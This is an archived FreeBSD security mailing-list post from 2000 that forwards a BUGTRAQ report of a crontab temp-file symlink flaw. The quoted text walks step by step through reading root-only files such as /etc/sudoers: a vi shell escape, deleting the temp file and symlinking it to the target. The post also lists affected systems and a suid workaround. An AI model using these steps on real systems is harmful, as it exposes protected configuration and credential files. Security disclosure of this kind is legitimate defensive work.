Date: Thu, 26 Oct 2000 14:36:25 +0200 (MET DST) From: Konrad Heuer <kheuer@gwdg.de> To: freebsd-security@freebsd.org Subject: Re: [ Hackerslab bug_paper ] HP-UX crontab temporary file symboliclink vulnerability (fwd) Message-ID: <Pine.OSF.4.10.10010261430310.2401-100000@gwdu20.gwdg.de>
next in thread | raw e-mail | index | archive | help
Exploit below could be reproduced on 4.1-R and Compaq Tru64 UNIX 4.0D; seems to depend on the way vi stores edit info in /tmp. Exploit does not work with emacs, e.g. I removed suid bit of crontab as a workaround. Its not possible for a user to modify files owned by someone else in this way. Regards K. Heuer (kheuer@gwdg.de) ---------- Forwarded message ---------- Date: Wed, 25 Oct 2000 12:30:47 +0200 From: "Fabio Pietrosanti (naif)" <fabio@telemail.it> Reply-To: naif@inet.it To: BUGTRAQ@SECURITYFOCUS.COM Subject: Re: [ Hackerslab bug_paper ] HP-UX crontab temporary file symboliclink vulnerability Resent-Date: Thu, 26 Oct 2000 14:17:27 +0200 (MET DST) Resent-From: Eckhard Handke <ehandke@gwdg.de> Resent-To: Konrad Heuer <kheuer@gwdg.de> Resent-Subject: Re: [ Hackerslab bug_paper ] HP-UX crontab temporary file symboliclink vulnerability Tested also on: FreeBSD 3.3 = Vulnerable FreeBSD 2.2.8 = Vulnerable Aix 4.2 = Not Vulnerable Linux Slackware 7.0 = Not Vulnerable Linux Slackware 4.0 = Not Vulnerable naif On Tue, 24 Oct 2000, Sergey Nenashev wrote: > Hi, > > Tested on > 4.0-RELEASE FreeBSD 4.0-RELEASE #9 > 4.1-RELEASE FreeBSD 4.1-RELEASE #1: > > > Can read any file wich start with comment simbol (#) > > > > $ ls -l /etc/sudoers > -r-------- 1 root wheel 313 24 oct 20:20 /etc/sudoers > $ id > uid=1002(alf) gid=1002(alf) groups=1002(alf) > > > $ crontab -e > ~ > ~ > ~ > /tmp/crontab.hLmjTbK417 > :!sh > > [ #### Make simbolik link] > > rm /tmp/crontab.hLmjTbK417 > > ln -sf /etc/sudoers /tmp/crontab.hLmjTbK417 > > exit > > [ #### quit vi ] > /tmp/crontab.hLmjTbK417 > crontab: installing new crontab > > [ #### start crontab editor] > > $ crontab -e > [####### See in vi] > # sudoers file. > # > # This file MUST be edited with the 'visudo' command as root. > # > # See the sudoers man page for the details on how to write a sudoers > file. > # > > # Host alias specification > > # User alias specification > > # Cmnd alias specification > > # User privilege specification > root ALL=(ALL) ALL > alf ALL=(ALL) ALL > ~ > ~ > ~ > > > > > If file started with no # then crontab sad > > "/tmp/crontab.GAeNMP1357":2: bad minute > crontab: errors in crontab file, can't install > > > > > -- > ------ > Alf Delems<alf@isd.memonet.ru> > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.OSF.4.10.10010261430310.2401-100000>